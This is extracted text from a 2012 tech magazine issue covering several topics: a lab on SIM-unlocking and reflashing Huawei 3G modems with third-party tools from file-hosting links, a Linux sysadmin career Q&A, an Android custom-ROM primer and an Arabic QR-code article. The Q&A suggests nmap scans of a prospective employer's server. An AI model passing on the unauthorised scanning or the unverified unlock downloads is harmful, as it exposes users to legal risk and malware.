Si vous êtes intéressé par ces opéra-tions, à vous la suite.

Activation des appels mobiles& Mise à jour du firmwire

Modems CiblésHuaweiE156, E155, E1550, E1552, E156G, E160, E160G, E161, E166, E169, E169G,E170, E172, E176, E1762, E180, E182E, E196, E226, E270, E271, E272, E510,E612, E618, E620, E630, E630+, E660, E660A, E800, E870, E880, EG162, E880,EG162, EG162G, EG602, EG602G

Si vous avez un autre type ne déses-

pérez pas il s’agit de la même procédure.

Contactez-nous par mail pour vous aider.

P

2012www.Teramagazine.tk 30

30

Tera-Labo

Fig.1

Présentation du modem E1550

Le modem sujet de notre labo est Huawei E1550 :Il s’agit d’un modem qui supporte un débit de 3.6 mbps. Ce modem qui peut vous coûter >100 dh est un modem crée par l’équipementier chinois Huawei pour les opérateurs marocains.

START :

Part1 : Flasher et libérer votre modem 3G :

Cette opération s’effectue lorsqu’ on veut casser la restriction imposée par l’opérateur d’origine qui fait que le modem n’accepte que la puce de ce dernier. Cette restriction n’arrange pas les utilisateurs qui ont d’autres puces des autres opérateurs. Pour s’en débar-rasser nous procédons au flashage du modem. L’opération est simple à effec-tuer et ne met pas en danger votre appareil. Je vous présenterai le moyen le plus facile et le plus efficace pour

réussir à 99% cette opération

Étape 1 :Procurez vous le logiciel suivant :

GSM Multi Hub récupérable à http://www.mediafire.com/?dk2k7s4btqiesvk

Ce logiciel est destiné à un grand

nombre de modèle de différents constructeurs Alcatel, ZTE…

Il est simple à utiliser et très perfor-mant doté d’une interface riche d’op-tion que nous allons découvrir par la suite.

Étape 2Vérifier que votre modem est bien

détecté par votre ordinateur et que son driver est installé. Soit vous instal-ler les drivers usine :

Download Huawei E1550 Driver (http://www.dc-files.com/files/huawei/modems/Varies/driver/Huawei_Driver.zip) ou vous contentez des drivers four-nies par l’opérateur.

Maintenant, il vous reste que suivre les démarches suivantes pour réussir l’opération

Étape 3Dans cette étape on configure notre

logiciel. On commence par récupérer des informations système pour que le logiciel détecte notre modem.

On choisie l’onglet PORT SETTING :

Comment savoir le modèle ?

Le modèle est indiqué sur le dos de votre modem, comme le montre la figure ci-dessous(Fig1)

Fig2 : GSM Multi Hub

Tera-Magazine

31

Une interface se présente pour sélectionner le port de communica-tion avec le modem. On choisie entre ‘port modem Two’ ou ‘one’ pour le port mode celui qui a une liste des ports

opérationnels non vide.NB: Cette interface contient un mes-

sage religieux mis par le réalisateur chrétien.

Pour choisir quel port de communi-cation on fait appel au gestionnaire des périphériques (Fig3) et ceci en cliquant

sur le bouton système propriétés et on choisissant le ‘device manager’.On navigue dans ce dernier jusqu’au ‘port COM’ pour savoir sur quel COM le modem est actif. Dans cette manip j’ai le COM 15Je retourne dans logiciel ‘ GSM Multi Hub ‘ et j’indique la valeur COM15 dans le champ du port opérationnel.

Étape 4 :Tout est prêt pour flasher et libérer

(unlock) votre appareil. On choisie l’on-glet ‘Code calc’ et le modèle (huawei).On choisie le type du modem qui est ici le E1550 ensuite pour vérifier que le logiciel communique avec le modem on clique sur modem info. Le logiciel récupère tout seul toutes les informa-tions nécessaire (IMEI..) et il calcule les codes nécessaires. Ensuite un simple clique sur ‘unlock modem’ vous suffira

pour terminer l’opération avec succès. Félicitations votre modem est libre !!

Fig3 .

2012www.Teramagazine.tk 32

32

Tera-Labo

Part 2 : Mise à jour de l’interface « internet Mobile »

Si vous êtes un client IAM,INWI.. et vous utilisez E155 ou un modem similaire, vous êtes donc familier avec l’interface d’utilisation (Dashboard en Anglais) présentée dans la figure 7. Celle-ci est limitée car elle présente un menu basique qui gère la connexion Internet. Pour faire une comparaison, l’interface d’origine est présentée dans la figure 6.

On remarque l’apparition des opéra-tions : Call log, envoie et réception des MMS… qui ne figurent pas dans le logi-ciel offert par IAM. Cette interface (la version modifiée) est installée à partir

du modem qui la contient sous forme de logiciel embarqué (firmware).

BUT :Nous comptons désormais activer la

fonctionnalité des appels audio vidéo l’envoie et la réception des MMS sur son modem qui sont comme malheu-reusement désactivé par l’opérateur.

Ces fonctionnalités ne sont utiles que pour les abonnés au forfait mobiles et internet mais ça n’empêche pas de mettre à jour votre modem pour le remettre à la version complète.Notre intervention touche donc les 2 niveaux : l’inter-face d’utilisation et le fir-mware pour les remplacer par les originaux ou une version récente offerte par le constructeur et non par l’opérateur.

Fig.6 : interface offerte par le constructeur Huawei

Fig.7 : interface offerte par l’opérateur

Fig.8: Firmware IAM

Tera-Magazine

33

Passons à l’action :Étape 1 :

Tout d’abord, il faut connaître la version dont on dispose, soit celle du firmware soit celle de l’interface d’uti-lisation. Pour le faire, consultez l’onglet

outils et lancez “diagnostics” qui vous montre une interface qui présente les informations concernant votre modem.

Dans mon cas la version de l’interface fournie par IAM est la 21.005.15.05.162 pour activer les ap-pels par modem nous allons installer la version 16.001.06.01.500 qui est plus récente. Je signale qu’il n’est pas nécessaire de désinstaller l’interface (‘Internet Mobile’) offerte par IAM la nouvelle peut être utilisée même en sa présence.

Fig.6 : interface offerte par le constructeur Huawei Fig.9

Fig.10

Fig.8: Firmware IAM

34

34

Tera-Labo

Etape 2 :Mise à jour de l’interface d’utilisation•TéléchargezetinstallezlelogicielHuawei Mobile Partner, il fonctionne sur Windows XP, Windows Vista et Win-dows 7 ainsi. Ensuite lancez-le. Voici le lien de téléchargement:http://www.mediafire.com/?m26xitgu27939is Étape 3:•Aprèsl’installation,configurezlepro-fil d’utilisation pour pouvoir se connec-ter au modem et essayez de vous connecter à Internet (Fig.11)

Part 3 :Mise a jour du FirmwareOn a recours à cette opération

si vous voulez changer les fichiers d’installation qui sont gravés dans la mémoire interne de votre modem, par un firmware plus développé. Dans une installation antérieure, c’est la nouvelle interface qui s’installera avec les fonc-tionnalités étendues et non celles de l’opérateur.

Étape 1 :Téléchargez “Huawei E1550 Firm-

ware Update” disponible sur le lien :http://www.mediafire. com/?xqhysbe9aowa832

Étape 2: Je vous propose la dernière ver-

sion mise à jour du firmware du mode «huawei 3g usb 1550 e» , totalement gratuite à télécharger. Vous pouvez aussi utiliser cette version si vous avez des problèmes avec l’ancien firmware. Vous pouvez également utiliser cette option mise à jour, lorsque votre modem ne semble pas fonctionner correcte-ment.

vous allez flasher votre modem Huawei avec cette nouvelle version. Les para-mètres actuels de votre profil de connexion seront perdus à cause de la nouvelle mise à jour. N’oubliez pas de mettre à jour le firmware d’un ordinateur avec une source d’alimentation stable. Parce que si votre ordinateur s’éteint lors de la mise à jour du firmware (qui prendra 5 ~ 15 minutes) le firmware de votre modem sera endomma-gé. Assurez-vous donc que vous avez une source d’alimentation à utiliser avec votre ordinateur.

Avertissement

Vous pouvez utiliser la nouvelle interface utilisateur pour profiter de votre modem sans faire une mise à jour du firmware inclus dans le mo-dem. Cette étape reste importante car, si vous pensez à faire une mise à jour il faut la faire avec une version qui marche bien avec votre modem. Donc, si vous êtes satisfaits du résultat obtenu vous n’êtes pas obligé de con-tinuer la suite

Important!!

Fig.11.

Tera-Magazine

35

La procédure est simple. Il suffit de télécharger et exécuter le ‘firmware update wizard’ pour huawei usb mo-dem 3G 1550.(Fig.12)

Après que la recherche et la détec-

tion du modem soient terminés, la mise à jour demande une confirmation, ac-ceptez-la, au bout de quelques minutes votre modem sera à jour firmware.

FinEn terminant cette simple opération, vous

aurais un modem huawei avec le dernier fir-mware à son intérieur.

Enfin notre cadeau aux lecteurs de Tera-magazine c’est l’interface graphique et le driver pour gérer votre modem huawei sous linux. http://www.mediafire.com/?j3a63cq1p4847tp

N’hésitez pas à nous envoyer vos feed-backs et vos commentaires vis à vis ce Labo.

Faites attention, une interruption de la mise à jour peut causer des problèmes de fonctionnement de votre modem.

Important!!

Fig.12

Fig.13

2012www.Teramagazine.tk 36

36

Tera-Labo

i vous voulez devenir un administrateur système,alors vous êtes entrain de lire le bon article. Je propose une série d’articles dans laquelle je compte vous initier à mon métier en tant qu’administrateur système Linux (opensue/Débian).

Durant mon contact avec les étudiants ou mes stagiaires, beaucoup d’entre eux montrent l’envie et l’enthousiasme pour devenir des administrateurs système «Linux». Je dis beaucoup et non la majorité car il existe ceux qui pré-fèrent le soit disant confort de Windows Server :), Sans doute une conclusion due aux erreurs pédagogiques. Je vais lister l’ensemble de questions qu’on me pose et mes réponses que je vois intéressant de partager vue qu’elles montrent les préoccupations des nouveaux recrues dans ce domaine.

S

Comment trouvez-vous votre travail ?

En deux mots je dirais amusant et très technique. Je m’amuse à résoudre les problèmes et d’apprendre chaque jour une nouvelle chose même si je suis dans ce job ça fait des lustres !. Un travail technique dans la mesure ou L’administration système demande beaucoup de connaissances surtout qu’on a souvent affaire en parallèle à d’autres domaines tels que la sécurité informatique, la gestion des réseaux, hardware, etc. Si vous n’avez pas de chance votre mission d’administrateur peut devenir difficile surtout si vous avez un grand parc à gérer en tant que débutant.

Je veux devenir un administrateur système Linux. Devrais-je essayer de se spécialiser dans une distribution

Linux particulière?

Je Crois que vous serez plus apte au travail en tant que généraliste qu’un spécialiste, surtout si vous êtes débu-tant mais cela dépend de votre situa-tion. Si vous faites une demande pour un emploi dans une entreprise connue pour être à l’aide de SUSE. Mais si vous n’avez pas une position spécifique dans l’esprit, mais vous préférez se concentrer sur une distribution, je vous conseil Red Hat Enterprise Linux.

Une astuce que je vous donne c’est de faire une collecte de donnée sur le système hôte du site web de l’entre-prise. Il y’a de grand chance que ce dernier soit hébergé dans l’un de leurs serveurs interne et par conséquent vous saurez quelle distribution est utilisée chez eux. Pour le faire utiliser nmap.

Metier de l’avenir

Q

Q

Le métier d’un Administrateur des systèmes : >> SYSADMIN

37

Metier de l’avenir

Je suis un habitué aux outils GUI de Windows. Dois je obligatoirement apprendre à utiliser les outils en commandes et les scripts pour admi-nistrer Linux ?

En un mot, oui. Il est probablement vrai que sur une distribution Linux moderne, vous pouvez effectuer un bon nombre de tâches d’administra-tion classiques, tels que la création de comptes d’utilisateurs et l’installation d’un nouveau logiciel en utilisant un outil graphique. Tôt ou tard, ces outils vont s’essouffler, et vous verrez que la ligne de commande est la seule façon d’aller. Par exemple, je ne connais pas de méthode pour fixer des quo-tas disques par utilisateur, sauf par ligne de commande. Il existe au moins trois autres raisons de se familiariser avec la ligne de com-mande.

Apprenez à aimer la CLITout d’abord, les connaissances

en ligne de commande sont plus

susceptibles d’être transférables entre les distributions linux, alors que les outils graphiques ont tendance à être spécifiques à la distribution. Deuxiè-mement et c’est le plus important, il y a une bonne chance que beaucoup de

vos serveurs ne disposent pas d’écrans ni d’interfaces graphiques.

Comment puis-je commencer?

Bonne question, vous avez à exer-cer. Il y a beaucoup de façons d’obtenir une machine pour s’ entraîner. Vous pouvez télécharger un CD ISO d’une distribution (Redhat,Centos, Suse..). Vous pouvez débuter avec Ubuntu si c’est le premier contact avec Linux. Vous pouvez les installer sur du maté-riel réel, ou à l’intérieur d’une machine virtuelle telle que VMWare ou Virtual-Box (libre et gratuit) sur des hôtes Windows (Fig1). Essayez de mettre en place deux machines de sorte que vous pouvez jouer avec la mise en réseau.

Ensuite, il suffit de’ brico-ler’: testez les commandes linux, créer de simple scripte, mettre en place un serveur web, configurer un pare-feu, essayer de manipuler les fichiers de configuration etc. Amusez-vous.

Pourriez me donnez un exemple pratique ou une tache que fait l’ad-min system, les outils utilisés?

Les administrateurs sont face à de nombreux problème dont le premier est ‘comment puis-je accéder aux ser-veurs distants que je suis censé admi-nistrer?. Car La plupart des temps ils n’ont pas un accès physique aux ma-chines qu’ils gèrent surtout si le parc informatique est éparpillé.

En effet, beaucoup d’entre eux ont des machines Linux/Windows sur leurs ordinateurs de bureau et s’appuient sur des outils d’accès à distance.

Pour accéder à l’invite de com-mande sur leurs serveurs, les adminis-trateurs utilisent généralement le shell sécurisé (SSH). La plupart des distribu-

QQ

Q

Fig.1: RHEL 5 en VirtualBox

www.Teramagazine.tk

38Tera-Magazine

2012 38

tions Linux installe et activer le démon sshd par défaut, souvent, c’est le seul service qu’on exécute après une ins-tallation d’un serveur Linux. Si le poste client (celui du bureau de l’admin) fonctionne sous Linux alors il a presque certainement le client SSH installé,

>>La magie de SSH

Si l’ordinateur client exécute Win-dows, il n’a probablement pas un client SSH installé par défaut. Les adminis-trateurs utilisent le plus souvent l’outil putty (www.putty.org). Il y’a aussi Cygwin, qui est une étonnante collec-tion d’outils Linux pour Windows, y compris SSH. Pour commencer avec Cygwin, téléchargez-le et exécutez le programme d’installation à partir www.cygwin.com. Le programme d’installa-tion vous permet de choisir les pièces de Cygwin que vous voulez installer. Putty et Cygwin sont disponibles gra-tuitement. De mon côté Je préfère Cygwin car ressemble à un client SSH Linux.

.... Et graphique

Si vous souhaitez accéder à un environnement de bureau complet sur vos serveurs, il existe plusieurs options; Le mécanisme de fenêtrage Linux (X Window) est une architecture client / serveur. Donc, une façon d’accéder à distance à un ordinateur Linux est d’exécuter les outils graphiques d’un serveur X sur votre Windows. Pendant de nombreuses années, Hummingbird Exceed étais le produit populaire sous Windows. Il y’a aussi Sming. Cepen-dant, leurs mise en place n’est pas toujours facile.

Une autre solution plus facile consiste à utiliser une technologie de visualisation de bureau à distance tel que VNC.

Pour utiliser VNC, vous devez instal-

ler un serveur VNC sur la machine dis-tante. Celle-ci se présente à toutes les applications graphiques fonctionnant sur cette machine en tant que serveur X normal.

Nous allons chercher un package approprié:

Yum search vnc (Centos,Fedora..)Vous pouvez l’installer avec:Yum install tigervnc-server

Maintenant que le paquet est ins-tallé, vous pouvez chercher n’importe quel tutoriel pour apprendre à utiliser et à configurer VNC.

Quelles sont les commandes de base que je dois savoir?

Il existe des outils classiques (ps, grep, traceroute, ..) que les adminis-trateurs utilisent. Vous aurez besoin de lire les pages de manuel de ces commandes.

Q

Fig.2

Métier de l’avenirTera-Magazine

39

Comme un début je vous recommande les commande listées dans la Fig.2 (vous pouvez l’utiliser comme fond d’écran) :

Je ne suis pas bon en anglais est-ce un problème ?

Vous devez avoir un bon anglais pour lire la documentation. Mais ne vous in-quiétez pas l’anglais technique est facile à apprendre.

Y-a-t’il des problèmes courants avec le milieu du travail? Le sysadmin est-il isolé?

Isolé non, mais plutôt indépendant. Les problèmes on n’en manque pas sur-tout avec les non informaticiens le dessin comique suivant peut vous donnez une idée.

Q

Q

Le mois prochain, nous allons ap-prendre à configurer les paramètres réseau de nos machines, la mise en place des adresses IP, DNS, routage, etc. Ainsi que les outils de gestion des ces services. ne ratez donc pas la suite.

Mois Prochain

2012www.Teramagazine.tk 40

40

or the tech enthusiast the ability to install custom ROMs is one of the great bonuses that comes with owning an

Android phone. You buy your phone, use it for a while as the manufacturer intended, then, after the newness fac-tor has worn off, you start hacking it to make it work exactly how you want it to.

When you flash a new ROM to your phone you are replacing all of the software that was on it with something new (the same thing as we saw in the Tera-Labo). The entire OS id wiped and a new version installed.

Sometimes this might be a similar version to what you had before, but tweaked to make it faster or introduce a few new features.

Sometimes the new ROM might re-move the customizations that the man-ufacturer added to help differentiate its product from the rest of the market. And sometimes a new ROM can bring you a new Os altogether. The rollout of the new versions of the Android Os to older handsets is notoriously slow, and the custom TOM route is very often the quickest way to keep your phone up to date.

Taking the custom ROM route does not come without a few implica-tions. The main being the effect on your phones then it goes without say-ing that you won’t be able to get sup-port from the manufacturer or your network should you encounter soft-ware problems, or hardware problems caused by software issues, such as problems with the app. Likewise, if your phone fails to boot during the flashing process you’ll need to fix it yourself(but there is excellent community support and our Tera-team that will help

you).The warranty issue with regard to

hardware issues is less clear. Physical problems with your phone that have no connection to software, such as the USB port coming loose, ought not to affected by rooting and flashing. As a general rule if you can return your phone to its locked, unrooted state, then you should do so before you make a claim on the warranty.

In order to flash a custom ROM you will need to have done two things on your phone. First you need to have rooted it (you can read about phone rooting in a previous topic in tera-mag-

Hack your Android phone… to longer battery life, faster perfor-mance and better appsHow to start hacking your Android phone, and which ROMs you need to install

F

Android

41

azine). This is the process that gives you ‘root access’ to your phone’s OS. Second, you will need to have unlocked the device’s bootloader. The bootloader controls what happens when the phone boots up. If it is

locked when it encounters ‘unauthorized’ software, such as a custom ROM, it will pre-vent the phone from booting. If it is unlocked then it will al-low this software to run.

Most rooting procedures normally encompass unlock-ing the bootloader at the same time. After rooting your phone you’re ready to flash your ROM. The question now is where do you find them, and which one should you choose. ROMs are generally split into two groups. There

are those based on AOSP (the Android Open Source Project) and present a ‘pure’ version of the Android experience; and there those that are device specific, based on the device’s own ROM, but tuned or streamlined for a particular purpose.

For the first question, there are many sources online for ROMs. The forums at xda-developpers.com are the primary source, with sections dedicated to virtually every handset. Most ROMS are designed for specific handsets, but three are a few that are widely available for multiple de-vices, including CyanogenMod, AOKP and Miui, and if you choose those you’ll find websites specific to their development (and community forums providing sup-

port).These multi-device ROMs represent the

best starting point for the new user, and also the best place to go for a day-to-day ROM that you can install. They have the largest user base and usually deliver the best balance between performance and stability. You can find a good To Flash a ROM for your Android device

http://forum.xda-developers.com/wiki/in-dex.php?title=Flashing_Guide_-_Android

In the next Tera’s labo we’ll inshalah use an HTC or a Samsung phone to hack it and install a new ROM. We are waiting for your feedbacks!

Flashing a new ROM

Hack your Android phone

A new ROM can change the look and speed of any phone

42

بك Iphone اي فون

يمكنكم العثور على برامج عديدة من بينها تطبيق Barcodes المجاني

http://itunes.apple.com/fr/app/barcodes Android أندرويد

Qr barcode scanner برنامج فعال و مجاني يقدم العديد من المميزات

googleplay موجود ب

منافع الرمز المربع مثال حديث إلستعمال رمز

QR هو المساعدة على إيجاد المفقودات. الفكرة يقدمها موقع

www.findercodes.com

حيث يقدم لك رموز خاصة بك و في حالة ضياع متاعك يمكن لمن وجده و بفضل قراءة الرمز يتمكن

من التعرف عليك و اإلتصال بك كما توضح ذلكالصورة أسفله

أنصحكم بتجربة هذه التقنية المفيدة و الممتعة على حد سواء كما أشير الى وجود تقنيات

االسهل و األكتر QR مشابهة لكن تبقى رموزانتشاراً

رمز االستجابة السريع أو الرمز

المربعQR Codes

تقديم رمز االستجابة السريع أو الرمز المربع

أو Quick Response code : باإلنجليزي ( QR code) ًإختصارا

هو نوع من مصفوفة الشفرات الخيطية أو الباركود )أو الرمز الثنائي األبعاد. يتكون الرمز

من وحدات سوداء مرتبة على شكل مربع على خلفية بيضاء تحتوي المعلومات المشفرة

يمكن تخزين أي نوع من البيانات الرقمية العنوان , URL العنوان على شبكة اإلنترنت

,األرقام, وما إلى ذلك .. يمكن فك رموزه بواسطة الهاتف المحمول

المزود بكاميرا أول استخدام له كان في تصميم صناعة السيارات من قبل شركة

دنسو التابعة لشركة تويوتا وذلك في عام 1994 لتعقب المركبات أثناء عملية التصنيع. وفي اآلونة األخيرة، إنتشر هذا النظام خارج نطاق الصناعة بسبب سهولة القراءة بشكل

سريع ونسبة التخزين العالية. أصبحت استخداماته في مجاالت واسعة : مثل

التتبع التجاري، تذاكر النقل والترفيه، تسويق المنتجات وتعريف أسعار المنتجات والكثير من هذه التطبيقات تستهدف مستخدمي الهاتف

المحمولQr code كيف يمكنك إنشاء

بإمكان المستخدم توليد وطباعة رموز لآلخرين ويتم ذلك من خالل زيارة واحدة من العديد

من مواقع أو تطبيقات توليد رموز االستجابة السريعة المدفوعة أو المجانية. يمكنك

باستخدام موقع مثل Kaywa.com

QR بسهولة توليد رمز كما يمكنكم استعمال تطبيق

Qr barcode scanner المتوفر لهواتف اندرويد

كيفية قراءة الرمز المربع بهاتفك المحمول؟

لقراءة الرمز المربع، يجب أن تجهز هاتفك الجوال ببرنامج مناسب مناسب لطراز الهاتف الخاص

=Tera-magazine

TOURIA NHASSTÉCHNICIEN SPÉCIALISÉ EN RÉSEAU

Quize الرمز المربع

43

Participez et gagnez deux USB 8Go :

Quize

Quelle est la fonction en Java/c#/c++ que si on l’applique à la chaine tera donne ‘tera’ ?

Envoyer vos réponses à tera.revue@gmail.com pour parti-ciper à la tombola

la recherche sur internet est interdite.

La réponse au Quize précédent = la manette de jeu. Elle vibre et ne sonne pas :). Seulement 4 réponses reçus étaient correctes !!!!!!!!

44

Smile Space

Laissez-nous votre Mail sur le site :Teramagazine.tk pour recevoir les pro-chains numéros de TERA-MAGAZINE.os

Tera-Magazine

45

2012www.Teramagazine.tk 46

46

>>>Rejoignez-nous sur Facebook :

www.facebook.com/tera.maga

Hé, Vous!

Twitter & Facebook Dans le monde arabe

47

Twitter & Facebook Dans le monde arabe

48

http://goo.gl/jwYF0

@terarevue

http://t

era-magazine.blogsp

ot.com/

Tera.revue@gmail.com

votre soutien est important pour nous

facebook.com/tera.maga

Pour nous suivre et nous Contacter

49